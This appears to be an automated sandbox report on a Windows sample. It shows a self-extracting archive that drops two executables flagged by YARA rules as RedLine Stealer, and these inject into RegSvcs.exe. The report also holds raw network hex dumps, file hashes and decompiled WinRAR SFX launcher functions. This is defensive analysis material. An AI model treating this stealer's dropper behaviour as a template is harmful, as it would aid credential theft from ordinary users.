2023-03-24 06:58:02 UTC	1680	IN	Data Raw: 62 36 2c 31 30 66 2c 31 33 32 2c 36 39 2c 37 64 2c 38 64 2c 31 31 36 2c 31 35 39 2c 61 31 2c 31 32 39 2c 39 32 2c 31 30 61 2c 31 32 64 2c 31 34 30 2c 39 30 2c 39 62 2c 36 30 2c 38 66 2c 31 30 38 2c 62 38 2c 36 35 2c 61 37 2c 63 39 2c 63 66 2c 31 30 37 2c 64 65 2c 61 30 2c 36 30 2c 38 36 2c 61 63 2c 39 61 2c 35 65 2c 31 32 38 2c 33 34 2c 31 34 31 2c 66 35 2c 62 39 2c 36 39 2c 37 35 2c 63 33 2c 61 35 2c 39 66 2c 31 32 34 2c 31 33 65 2c 61 66 2c 61 64 2c 38 63 2c 31 30 63 2c 31 34 35 2c 35 63 2c 31 30 36 2c 62 38 2c 36 35 2c 39 33 2c 31 32 31 2c 61 62 2c 35 33 2c 39 63 2c 31 35 66 2c 31 30 30 2c 38 35 2c 63 30 2c 64 30 2c 37 66 2c 66 37 2c 61 33 2c 38 62 2c 34 65 2c 62 30 2c 31 31 36 2c 61 35 2c 37 39 2c 39 35 2c 65 63 2c 31 31 39 2c 37 61 2c 62 62 2c 39 61 Data Ascii: b6,10f,132,69,7d,8d,116,159,a1,129,92,10a,12d,140,90,9b,60,8f,108,b8,65,a7,c9,cf,107,de,a0,60,86,ac,9a,5e,128,34,141,f5,b9,69,75,c3,a5,9f,124,13e,af,ad,8c,10c,145,5c,106,b8,65,93,121,ab,53,9c,15f,100,85,c0,d0,7f,f7,a3,8b,4e,b0,116,a5,79,95,ec,119,7a,bb,9a
2023-03-24 06:58:02 UTC	1696	IN	Data Raw: 37 2c 64 61 2c 38 63 2c 39 39 2c 63 33 2c 63 37 2c 65 34 2c 65 30 2c 62 38 2c 62 38 2c 62 63 2c 39 36 2c 63 33 2c 61 66 2c 37 33 2c 65 63 2c 64 61 2c 64 39 2c 61 36 2c 65 34 2c 64 39 2c 61 31 2c 37 30 2c 62 36 2c 65 32 2c 63 62 2c 36 37 2c 38 37 2c 64 37 2c 61 35 2c 61 62 2c 63 36 2c 64 39 2c 64 61 2c 38 63 2c 38 65 2c 62 63 2c 63 61 2c 65 63 2c 64 38 2c 37 35 2c 38 34 2c 37 35 2c 36 62 2c 35 65 2c 36 31 2c 37 33 2c 39 39 2c 38 35 2c 38 39 2c 35 36 2c 62 31 2c 64 61 2c 61 32 2c 63 30 2c 63 30 2c 65 32 2c 63 62 2c 62 62 2c 39 35 2c 64 32 2c 38 36 2c 39 61 2c 37 37 2c 61 62 2c 63 62 2c 61 39 2c 35 61 2c 63 65 2c 62 63 2c 61 61 2c 61 37 2c 38 36 2c 38 38 2c 37 63 2c 36 32 2c 38 62 2c 36 65 2c 38 34 2c 61 65 2c 39 39 2c 39 66 2c 36 33 2c 61 39 2c 39 61 2c 39 Data Ascii: 7,da,8c,99,c3,c7,e4,e0,b8,b8,bc,96,c3,af,73,ec,da,d9,a6,e4,d9,a1,70,b6,e2,cb,67,87,d7,a5,ab,c6,d9,da,8c,8e,bc,ca,ec,d8,75,84,75,6b,5e,61,73,99,85,89,56,b1,da,a2,c0,c0,e2,cb,bb,95,d2,86,9a,77,ab,cb,a9,5a,ce,bc,aa,a7,86,88,7c,62,8b,6e,84,ae,99,9f,63,a9,9a,9
2023-03-24 06:58:02 UTC	1712	IN	Data Raw: 2c 39 32 2c 64 61 2c 31 32 39 2c 34 31 2c 61 32 2c 31 33 36 2c 36 66 2c 31 32 31 2c 62 39 2c 31 33 61 2c 31 32 34 2c 63 35 2c 37 63 2c 35 37 2c 65 39 2c 35 61 2c 62 37 2c 37 35 2c 31 34 63 2c 66 61 2c 31 33 37 2c 39 39 2c 63 62 2c 31 35 31 2c 31 36 62 2c 35 65 2c 31 31 66 2c 35 61 2c 62 63 2c 39 36 2c 36 62 2c 37 66 2c 31 32 39 2c 39 37 2c 63 38 2c 66 37 2c 65 66 2c 62 65 2c 31 35 66 2c 31 31 66 2c 37 30 2c 31 34 33 2c 66 62 2c 66 65 2c 36 66 2c 31 30 64 2c 66 66 2c 62 65 2c 66 31 2c 31 32 64 2c 31 36 61 2c 66 61 2c 38 33 2c 31 33 66 2c 36 66 2c 31 30 33 2c 61 34 2c 39 65 2c 31 32 38 2c 31 35 33 2c 66 35 2c 39 35 2c 66 30 2c 62 30 2c 64 34 2c 62 65 2c 61 65 2c 38 33 2c 61 61 2c 63 65 2c 62 35 2c 37 66 2c 34 33 2c 63 30 2c 64 62 2c 39 66 2c 31 33 65 2c 66 Data Ascii: ,92,da,129,41,a2,136,6f,121,b9,13a,124,c5,7c,57,e9,5a,b7,75,14c,fa,137,99,cb,151,16b,5e,11f,5a,bc,96,6b,7f,129,97,c8,f7,ef,be,15f,11f,70,143,fb,fe,6f,10d,ff,be,f1,12d,16a,fa,83,13f,6f,103,a4,9e,128,153,f5,95,f0,b0,d4,be,ae,83,aa,ce,b5,7f,43,c0,db,9f,13e,f

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 1JCAVkYU3U.exePID: 5296, Parent PID: 3452

General

Target ID:	0
Start time:	07:57:53
Start date:	24/03/2023
Path:	C:\Users\user\Desktop\1JCAVkYU3U.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\1JCAVkYU3U.exe
Imagebase:	0xb60000
File size:	1217709 bytes
MD5 hash:	719082DCC3C017E5B675C8B9EC74B6A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 123.exePID: 5180, Parent PID: 5296

General

Target ID:	1
Start time:	07:57:55
Start date:	24/03/2023
Path:	C:\Windows\Temp\123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\123.exe"
Imagebase:	0x190000
File size:	1200128 bytes
MD5 hash:	067B24F2A101E4B49D45E14F81D41EDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.279375069.00000000001C3000.00000004.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.264083282.0000000000C92000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 38%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 321.exePID: 5152, Parent PID: 5296

General

Target ID:	2
Start time:	07:57:56
Start date:	24/03/2023
Path:	C:\Windows\Temp\321.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Temp\321.exe"
Imagebase:	0x1370000
File size:	2072576 bytes
MD5 hash:	5B87AD276E221A90FF038CB69929F321
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 36%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 5168, Parent PID: 5180

General

Target ID:	3
Start time:	07:57:56
Start date:	24/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xe40000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.471223737.0000000000402000.00000020.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.489261613.000000000324F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.489261613.000000000330A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4580, Parent PID: 5180

General

Target ID:	5
Start time:	07:57:57
Start date:	24/03/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 232
Imagebase:	0xd30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 6644, Parent PID: 5152

General

Target ID:	6
Start time:	07:57:58
Start date:	24/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0xeb0000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6768, Parent PID: 5152

General

Target ID:	8
Start time:	07:57:59
Start date:	24/03/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 220
Imagebase:	0xd30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 7032, Parent PID: 3452

General

Target ID:	11
Start time:	07:58:13
Start date:	24/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x400000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7040, Parent PID: 7032

General

Target ID:	12
Start time:	07:58:13
Start date:	24/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: RegSvcs.exePID: 6460, Parent PID: 3452

General

Target ID:	17
Start time:	07:58:26
Start date:	24/03/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x560000
File size:	45152 bytes
MD5 hash:	2867A3817C9245F7CF518524DFD18F28
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6424, Parent PID: 6460

General

Target ID:	18
Start time:	07:58:26
Start date:	24/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 1JCAVkYU3U.exePID: 5296, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	1520
Total number of Limit Nodes:	49

Executed Functions

Function 00B7DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00B7DF1E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t40;
				void* _t41;
				long _t50;
				void* _t53;
				intOrPtr _t57;
				struct HWND__* _t73;
				void* _t74;
				WCHAR* _t92;
				struct HINSTANCE__* _t93;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t120;

				_t120 = __fp0;
				_t86 = __edx;
				E00B70863(__edx, 1);
				E00B7A64D("C:\Users\engineer\Desktop", 0x800);
				_t75 =  &_v208;
				E00B7AC16( &_v208); // executed
				_t73 = 0;
				E00B7FFF0(0x7104, 0xbb7b80, 0, 0x7104);
				_t101 = _t100 + 0xc;
				_t92 = GetCommandLineW();
				_t105 = _t92;
				if(_t92 != 0) {
					_push(_t92);
					E00B7C5C4(0, _t105);
					if( *0xbaa471 == 0) {
						E00B7DBDE(__eflags, _t92); // executed
					} else {
						_t98 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t98 != 0) {
							UnmapViewOfFile(_t74);
							_t73 = 0;
						}
						CloseHandle(_t98);
					}
				}
				GetModuleFileNameW(_t73, 0xbbec90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xbbec90); // executed
				GetLocalTime(_t101 + 0xc);
				_push( *(_t101 + 0x1a) & 0x0000ffff);
				_push( *(_t101 + 0x1c) & 0x0000ffff);
				_push( *(_t101 + 0x1e) & 0x0000ffff);
				_push( *(_t101 + 0x20) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				E00B64092(_t101 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t101 + 0x24) & 0x0000ffff);
				_t102 = _t101 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t102 + 0x7c);
				_t93 = GetModuleHandleW(_t73);
				 *0xba102c = _t93;
				 *0xba1028 = _t93; // executed
				_t40 = LoadIconW(_t93, 0x64); // executed
				 *0xbb7b7c = _t40; // executed
				_t41 = E00B7B6DD(_t75, _t86, _t120); // executed
				 *0xbbec84 = _t41;
				E00B6DA42(0xba1030, _t86, 0, 0xbbec90);
				E00B790B7(0);
				E00B790B7(0);
				 *0xba8440 = _t102 + 0x5c;
				 *0xba8444 = _t102 + 0x30; // executed
				DialogBoxParamW(_t93, L"STARTDLG", _t73, E00B7B7E0, _t73); // executed
				 *0xba8444 = _t73;
				 *0xba8440 = _t73;
				E00B79178(_t102 + 0x24);
				E00B79178(_t102 + 0x50);
				_t50 =  *0xbbfca8;
				if(_t50 != 0) {
					Sleep(_t50);
				}
				if( *0xba9468 != 0) {
					E00B7AE2F(0xbbec90);
				}
				E00B6F279(0xbb7a78);
				if( *0xbbfca0 > 0) {
					L00B7EE5C( *0xbbfc90);
				}
				DeleteObject( *0xbb7b7c);
				_t53 =  *0xbbec84;
				if(_t53 != 0) {
					DeleteObject(_t53);
				}
				if( *0xba1098 == 0 &&  *0xba8454 != 0) {
					E00B66D83(0xba1098, 0xff);
				}
				_t54 =  *0xbbfcac;
				 *0xba8454 = 1;
				if( *0xbbfcac != 0) {
					E00B7DC3B(_t54);
					CloseHandle( *0xbbfcac);
				}
				_t94 =  *0xba1098;
				if( *0xbb7b7a != 0) {
					_t57 =  *0xb9e728; // 0x3e8
					if( *0xbb7b7b == 0) {
						__eflags = _t57;
						if(_t57 < 0) {
							_t94 = _t94 - _t57;
							__eflags = _t94;
						}
					} else {
						_t94 =  *0xbbfca4;
						if(_t57 > 0) {
							_t94 = _t94 + _t57;
						}
					}
				}
				E00B7AC7C(_t102 + 0x1c); // executed
				return _t94;
			}

0x00b7df1e
0x00b7df1e
0x00b7df29
0x00b7df38
0x00b7df3d
0x00b7df41
0x00b7df4b
0x00b7df54
0x00b7df59
0x00b7df62
0x00b7df64
0x00b7df66
0x00b7df68
0x00b7df69
0x00b7df74
0x00b7dfe1
0x00b7df76
0x00b7df89
0x00b7df8d
0x00b7dfce
0x00b7dfd4
0x00b7dfd4
0x00b7dfd7
0x00b7dfdd
0x00b7df74
0x00b7dff2
0x00b7dffe
0x00b7e009
0x00b7e014
0x00b7e01a
0x00b7e020
0x00b7e026
0x00b7e02c
0x00b7e032
0x00b7e048
0x00b7e04d
0x00b7e05a
0x00b7e067
0x00b7e06c
0x00b7e072
0x00b7e078
0x00b7e07e
0x00b7e083
0x00b7e08e
0x00b7e093
0x00b7e09c
0x00b7e0a5
0x00b7e0b5
0x00b7e0c4
0x00b7e0c9
0x00b7e0d3
0x00b7e0d9
0x00b7e0df
0x00b7e0e8
0x00b7e0ed
0x00b7e0f4
0x00b7e0f7
0x00b7e0f7
0x00b7e104
0x00b7e106
0x00b7e106
0x00b7e110
0x00b7e11c
0x00b7e124
0x00b7e129
0x00b7e130
0x00b7e136
0x00b7e13d
0x00b7e140
0x00b7e140
0x00b7e14d
0x00b7e162
0x00b7e162
0x00b7e167
0x00b7e16c
0x00b7e175
0x00b7e178
0x00b7e183
0x00b7e183
0x00b7e190
0x00b7e196
0x00b7e19f
0x00b7e1a4
0x00b7e1b4
0x00b7e1b6
0x00b7e1b8
0x00b7e1b8
0x00b7e1b8
0x00b7e1a6
0x00b7e1a6
0x00b7e1ae
0x00b7e1b0
0x00b7e1b0
0x00b7e1ae
0x00b7e1a4
0x00b7e1be
0x00b7e1ce

APIs

Part of subcall function 00B70863: GetModuleHandleW.KERNEL32(kernel32), ref: 00B7087C
Part of subcall function 00B70863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B7088E
Part of subcall function 00B70863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B708BF

Part of subcall function 00B7A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B7A655

Part of subcall function 00B7AC16: OleInitialize.OLE32(00000000), ref: 00B7AC2F
Part of subcall function 00B7AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B7AC66
Part of subcall function 00B7AC16: SHGetMalloc.SHELL32(00BA8438), ref: 00B7AC70

GetCommandLineW.KERNEL32 ref: 00B7DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B7DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B7DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00B7DFCE

Part of subcall function 00B7DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00B7DBF4
Part of subcall function 00B7DBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B7DC30

CloseHandle.KERNEL32(00000000), ref: 00B7DFD7
GetModuleFileNameW.KERNEL32(00000000,00BBEC90,00000800), ref: 00B7DFF2
SetEnvironmentVariableW.KERNELBASE(sfxname,00BBEC90), ref: 00B7DFFE
GetLocalTime.KERNEL32(?), ref: 00B7E009
_swprintf.LIBCMT ref: 00B7E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B7E05A
GetModuleHandleW.KERNEL32(00000000), ref: 00B7E061
LoadIconW.USER32(00000000,00000064), ref: 00B7E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00B7E0C9
Sleep.KERNEL32(?), ref: 00B7E0F7
DeleteObject.GDI32 ref: 00B7E130
DeleteObject.GDI32(?), ref: 00B7E140
CloseHandle.KERNEL32 ref: 00B7E183

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00B7E039
winrarsfxmappingfile.tmp, xrefs: 00B7DF77
sfxname, xrefs: 00B7DFF9
sfxstime, xrefs: 00B7E055
C:\Users\user\Desktop, xrefs: 00B7DF33
STARTDLG, xrefs: 00B7E0BE

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-277078469
Opcode ID: d3eb7edf9e17e534bda3ca0ecd5ab7272fc0df383c50eb5627d8ab4827358f5f
Instruction ID: 7bc51d38eb7eb6a14b89e025f47aed7d8a8775beb4db147594e9d843dae78b9e
Opcode Fuzzy Hash: d3eb7edf9e17e534bda3ca0ecd5ab7272fc0df383c50eb5627d8ab4827358f5f
Instruction Fuzzy Hash: E661D471904215AFD321AB74AC5AF7B3BECEF49B40F0044AAF519A32A1DFB4D944C762

Uniqueness

Uniqueness Score: -1.00%

Function 00B7A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00B7A6C2(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t27;
				char* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t39;
				long _t44;
				intOrPtr* _t45;
				struct HRSRC__* _t46;

				_t14 = FindResourceW( *0xba1028, _a4, "PNG"); // executed
				_t46 = _t14;
				if(_t46 == 0) {
					L15:
					return 0;
				}
				_t44 = SizeofResource( *0xba1028, _t46);
				if(_t44 == 0) {
					goto L15;
				}
				_t17 = LoadResource( *0xba1028, _t46);
				if(_t17 == 0) {
					goto L15;
				}
				_t18 = LockResource(_t17);
				_t47 = _t18;
				if(_t18 == 0) {
					goto L15;
				}
				_v4 = 0;
				_t19 = GlobalAlloc(2, _t44); // executed
				_t36 = _t19;
				if(_t36 == 0) {
					L14:
					return _v4;
				}
				if(GlobalLock(_t36) == 0) {
					L13:
					GlobalFree(_t36);
					goto L14;
				}
				E00B80320(_t21, _t47, _t44);
				_v8 = 0;
				_push( &_v8);
				_push(0);
				_push(_t36);
				if( *0xbc3180() == 0) {
					_t27 = E00B7A626(_t25, _t38, _v20, 0); // executed
					_t39 = _v28;
					_t45 = _t27;
					 *0xb93278(_t39);
					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 8))))();
					if(_t45 != 0) {
						 *((intOrPtr*)(_t45 + 8)) = 0;
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							_push(0xffffff);
							_t34 =  &_v20;
							_push(_t34);
							_push( *((intOrPtr*)(_t45 + 4)));
							L00B7EB26(); // executed
							if(_t34 != 0) {
								 *((intOrPtr*)(_t45 + 8)) = _t34;
							}
						}
						 *0xb93278(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t45))))();
					}
				}
				GlobalUnlock(_t36);
				goto L13;
			}

0x00b7a6d5
0x00b7a6db
0x00b7a6df
0x00b7a7db
0x00000000
0x00b7a7db
0x00b7a6f2
0x00b7a6f6
0x00000000
0x00000000
0x00b7a703
0x00b7a70b
0x00000000
0x00000000
0x00b7a712
0x00b7a718
0x00b7a71c
0x00000000
0x00000000
0x00b7a729
0x00b7a72d
0x00b7a733
0x00b7a737
0x00b7a7d3
0x00000000
0x00b7a7d8
0x00b7a746
0x00b7a7cc
0x00b7a7cd
0x00000000
0x00b7a7cd
0x00b7a74f
0x00b7a757
0x00b7a75f
0x00b7a760
0x00b7a761
0x00b7a76a
0x00b7a771
0x00b7a776
0x00b7a77a
0x00b7a784
0x00b7a78a
0x00b7a78e
0x00b7a793
0x00b7a798
0x00b7a79a
0x00b7a79f
0x00b7a7a3
0x00b7a7a4
0x00b7a7a7
0x00b7a7ae
0x00b7a7b0
0x00b7a7b0
0x00b7a7ae
0x00b7a7bb
0x00b7a7c3
0x00b7a7c3
0x00b7a78e
0x00b7a7c6
0x00000000

APIs

FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,00B7B73D,00000066), ref: 00B7A6D5
SizeofResource.KERNEL32(00000000,?,?,?,00B7B73D,00000066), ref: 00B7A6EC
LoadResource.KERNEL32(00000000,?,?,?,00B7B73D,00000066), ref: 00B7A703
LockResource.KERNEL32(00000000,?,?,?,00B7B73D,00000066), ref: 00B7A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B7B73D,00000066), ref: 00B7A72D
GlobalLock.KERNEL32 ref: 00B7A73E
GlobalUnlock.KERNEL32(00000000), ref: 00B7A7C6

Part of subcall function 00B7A626: GdipAlloc.GDIPLUS(00000010), ref: 00B7A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B7A7A7
GlobalFree.KERNEL32 ref: 00B7A7CD

Strings

PNG, xrefs: 00B7A6C6

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 74fdf2a265a4dd1b343d07dbee53d38885b4b1855212749b205a27db9c86aa75
Instruction ID: 85cd465e2382fefaddd65c10a0fd69928d158766173379a358f43359259627e2
Opcode Fuzzy Hash: 74fdf2a265a4dd1b343d07dbee53d38885b4b1855212749b205a27db9c86aa75
Instruction Fuzzy Hash: A1319E75601312AFC7149F21ED88D2B7BF8EF88B50B04495AF91993660EF31DD449AA2

Uniqueness

Uniqueness Score: -1.00%

Function 00B6A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00B6A69B(void* _a4, WCHAR* _a8, intOrPtr _a12) {
				intOrPtr _v572;
				intOrPtr _v580;
				intOrPtr _v588;
				struct _WIN32_FIND_DATAW _v596;
				short _v4692;
				int _t44;
				int _t49;
				signed int _t61;
				signed int _t62;
				void* _t63;
				long _t66;
				void* _t69;
				signed int _t78;
				void* _t79;
				intOrPtr _t80;
				void* _t81;

				E00B7EC50(0x1250);
				_t81 = _a4;
				_t79 = _t78 | 0xffffffff;
				_push( &_v596);
				if(_t81 != _t79) {
					_t44 = FindNextFileW(_t81, ??);
					__eflags = _t44;
					if(_t44 != 0) {
						L12:
						_t80 = _a12;
						E00B70602(_t80, _a8, 0x800);
						_push(0x800);
						E00B6C310(__eflags, _t80,  &(_v596.cFileName));
						_t49 = 0 + _v596.nFileSizeLow;
						__eflags = _t49;
						 *(_t80 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *(_t80 + 0x1008) = _v596.dwFileAttributes;
						 *((intOrPtr*)(_t80 + 0x1004)) = _v596.nFileSizeHigh;
						 *((intOrPtr*)(_t80 + 0x1028)) = _v596.ftCreationTime;
						 *((intOrPtr*)(_t80 + 0x102c)) = _v588;
						 *((intOrPtr*)(_t80 + 0x1030)) = _v596.ftLastAccessTime;
						 *((intOrPtr*)(_t80 + 0x1034)) = _v580;
						 *((intOrPtr*)(_t80 + 0x1038)) = _v596.ftLastWriteTime;
						 *((intOrPtr*)(_t80 + 0x103c)) = _v572;
						E00B715DA(_t80 + 0x1010,  &(_v596.ftLastWriteTime));
						E00B715DA(_t80 + 0x1018,  &(_v596.ftCreationTime));
						E00B715DA(_t80 + 0x1020,  &(_v596.ftLastAccessTime));
						L13:
